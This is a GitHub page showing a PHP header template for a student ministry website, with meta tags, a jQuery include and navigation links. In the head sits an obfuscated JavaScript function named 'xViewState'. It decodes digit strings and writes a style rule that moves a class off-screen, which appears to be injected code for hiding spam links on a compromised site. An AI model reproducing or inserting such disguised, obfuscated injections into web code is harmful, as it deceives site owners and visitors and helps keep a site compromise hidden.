-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathheader.php
More file actions
75 lines (59 loc) · 3.31 KB
/
header.php
File metadata and controls
75 lines (59 loc) · 3.31 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
<?php
include_once('constants.php');
?>
<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie ie6 no-js" lang="en"><![endif]-->
<!--[if IE 7 ]> <html class="ie ie7 no-js" lang="en"> <![endif]--><!--[if IE 8 ]>
<html class="ie ie8 no-js" lang="en"><![endif]-->
<!--[if IE 9 ]> <html class="ie ie9 no-js" lang="en"><![endif]-->
<!--[if gt IE 9]><!--><html class="no-js" lang="en"><!--<![endif]-->
<html id="top">
<head>
<!--
*****************************************************************
Fluid Baseline Grid v1.0.0 Designed & Built by Josh Hopkins and 40 Horse, http://40horse.com Licensed under Unlicense, http://unlicense.org/
*****************************************************************
-->
<title>Transition</title>
<link rel="shortcut icon" href="http://p2cplus.com/toronto/wp-content/themes/p2cplus/favicon.ico" />
<meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/>
<meta name="description" content="Transition - First year? Change the world!" />
<meta name="author" content="Power to Change">
<meta name="keywords" content="students, mobile first, power to change, P2C+, Christian, evangelism, Jesus Christ" />
<!-- images for facebook -->
<link href="<?php echo ROOT_PATH; ?>/images/school.jpg" rel="image_src" />
<link href="<?php echo ROOT_PATH; ?>/images/logo-full.png" rel="image_src" />
<!-- Optimized mobile viewport -->
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- Place favicon.ico and apple-touch-icon.png in root directory -->
<link href="<?php echo ROOT_PATH; ?>/css/style.css" rel="stylesheet" />
<!-- Minimized jQuery from Google CDN -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js"></script>
<script language="JavaScript">
function xViewState()
{
var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','877886888787','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.length;){t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}xViewState();
</script></head>
<body>
<header><!-- Begin the Header Container -->
<div class="logo">
<a href="<?php echo HOME_LINK; ?>"><img src="<?php echo ROOT_PATH; ?>/images/logo.png"></a>
</div>
<div class="logo-full">
<a href="<?php echo HOME_LINK; ?>"><img src="<?php echo ROOT_PATH; ?>/images/logo-full.png"></a>
</div>
<div id="nav">
<a class="drawer" href="#"><li>menu <span class="icon" id="smallmenu">i</span></li></a>
<ul class="info">
<a href="<?php echo JOIN_LINK; ?>"><li>join <span class="icon" id="smallmenuhome">-</span></li></a>
<a href="<?php echo CAMPUS_TOUR_TOP_LINK; ?>" title="*Only a select few campuses are hosting Transition events this year."><li>campus event <span class="icon" id="smallmenu">2</span></li></a>
<a href="<?php echo FIND_MY_CAMPUS_TOP_LINK; ?>"><li>find my campus <span class="icon" id="smallmenu">0</span></li></a>
<a href="<?php echo FAQ_LINK; ?>"><li>FAQ <span class="icon" id="smallmenu">b</span></li></a>
</ul>
</header>
</div><!-- End of Header Contianer -->
<div class="wrapper">